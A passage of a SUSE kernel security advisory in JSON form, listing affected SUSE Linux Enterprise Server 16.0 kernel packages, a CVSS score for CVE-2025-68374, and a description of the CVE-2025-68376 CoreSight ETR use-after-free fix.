"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68374"
},
{
"cve": "CVE-2025-68376",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68376"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncoresight: ETR: Fix ETR buffer use-after-free issue\n\nWhen ETR is enabled as CS_MODE_SYSFS, if the buffer size is changed\nand enabled again, currently sysfs_buf will point to the newly\nallocated memory(buf_new) and free the old memory(buf_old). But the\netr_buf that is being used by the ETR remains pointed to buf_old, not\nupdated to buf_new. In this case, it will result in a memory\nuse-after-free issue.\n\nFix this by checking ETR\u0027s mode before updating and releasing buf_old,\nif the mode is CS_MODE_SYSFS, then skip updating and releasing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
